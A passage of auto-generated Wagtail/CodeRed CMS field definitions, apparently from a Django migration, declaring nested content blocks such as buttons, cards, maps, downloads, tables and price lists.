('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', 
wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline 
Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', 
wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 
1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. 
Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), 
('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', 
wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), 
('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom 
CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], label='Content'))])), ('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', 
required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], 
label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), 
('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', 
wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', 
wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], 
label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a 
preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))])), ('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', 
max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), 
